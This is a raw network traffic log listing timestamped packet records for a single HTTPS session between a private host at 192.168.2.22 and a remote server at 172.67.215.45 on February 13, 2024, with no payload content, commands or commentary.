Feb 13, 2024 15:08:06.290544033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.290592909 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.290600061 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.290611982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.292179108 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.292208910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.292248011 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.292253971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.292279959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.294728994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.294754028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.294795036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.294800997 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.294996977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.296430111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.296458960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.296494007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.296499014 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.296520948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.298986912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.299012899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.299057007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.299062967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.299074888 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.301481962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.301511049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.301556110 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.301561117 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.301592112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.303472996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.303497076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.303536892 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.303544044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.303566933 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.305201054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.305227995 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.305269957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.305274963 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.305305004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.307686090 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.307714939 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.307759047 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.307785988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.307801008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.310178995 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.310208082 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.310249090 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.310264111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.310307980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.312148094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.312170982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.312207937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.312216043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.312239885 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.314692020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.314718962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.314750910 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.314760923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.314783096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.314840078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.316406012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.316427946 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.316469908 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.316476107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.316490889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.318943024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.318969965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.319005966 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.319026947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.319040060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.319065094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.320717096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.320739985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.320785999 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.320796967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.320810080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.323434114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.323460102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.323503017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.323508024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.323530912 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.325145960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.325167894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.325212955 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.325218916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.325227976 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.327718019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.327748060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.327780962 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.327785969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.327812910 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.329385996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.329407930 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.329452038 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.329467058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.329478979 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.331973076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.332006931 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.332051992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.332071066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.332087040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.333909988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.333933115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.333971024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.333976984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.334005117 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.335792065 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.335818052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.335850954 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.335856915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.335881948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.337696075 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.337718010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.337760925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.337774038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.337798119 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.339287996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.339320898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.339363098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.339378119 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.339390993 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.341062069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.341084957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.341124058 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.341139078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.341155052 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.342755079 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.342782974 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.342814922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.342820883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.342839956 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.344435930 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.344461918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.344540119 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.344547033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.346110106 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.346136093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.346177101 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.346180916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.346205950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.347238064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.347259045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.347304106 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.347309113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.347337008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.349109888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.349136114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.349174976 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.349180937 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.349210024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.350246906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.350267887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.350305080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.350312948 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.350332975 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.352097988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.352124929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.352166891 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.352190971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.352206945 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.353859901 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.353883028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.353928089 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.353935003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.353957891 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.355422020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.355448961 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.355482101 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.355489016 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.355510950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.356547117 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.356566906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.356609106 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.356636047 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.356652021 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.356688023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.358323097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.358347893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.358386040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.358393908 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.358406067 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.360130072 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.360157967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.360198975 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.360205889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.360222101 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.361377954 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.361401081 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.361439943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.361447096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.361479998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.363189936 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.363229036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.363259077 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.363265991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.363291025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.364480019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.364502907 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.364550114 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.364556074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.364583015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.366314888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.366341114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.366375923 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.366381884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.366406918 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.367592096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.367611885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.367655993 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.367661953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.367686033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.369415998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.369441986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.369481087 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.369487047 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.369505882 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.371144056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.371165991 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.371205091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.371210098 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.371222019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.372361898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.372400045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.372427940 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.372445107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.372458935 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.373668909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.373692036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.373750925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.373771906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.373790026 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.375591993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.375619888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.375663042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.375684023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.375698090 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.377367020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.377389908 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.377434015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.377444029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.377456903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.378514051 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.378539085 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.378576040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.378585100 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.378617048 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.380346060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.380366087 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.380409956 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.380417109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.380430937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.381423950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.381462097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.381483078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.381494999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.381510019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.381541967 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.381663084 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.383574009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.383605957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.383637905 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.383646011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.383657932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.383690119 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.384728909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.384753942 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.384793997 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.384802103 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.384843111 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.403862953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.403896093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.403950930 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.403981924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.404000998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.404962063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.404993057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.405021906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.405030012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.405045986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.406680107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.406708956 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.406759977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.406769037 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.406780005 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.407589912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.407620907 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.407656908 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.407664061 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.407727957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.409513950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.409539938 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.409575939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.409589052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.409599066 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.411051035 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.411083937 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.411118984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.411125898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.411137104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.412739992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.412769079 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.412801027 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.412806988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.412818909 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.413842916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.413868904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.413906097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.413916111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.413927078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.415560007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.415582895 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.415627956 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.415635109 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.415644884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.415788889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.416903973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.416928053 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.416971922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.416979074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.416990042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.417047977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.418757915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.418778896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.418808937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.418817043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.418834925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.418900013 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.419712067 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.419733047 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.419763088 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.419770002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.419780970 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.419836044 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.421454906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.421478987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.421523094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.421530008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.421541929 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.422838926 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.422859907 CET	443	49169	172.67.215.45	192.168.2.22
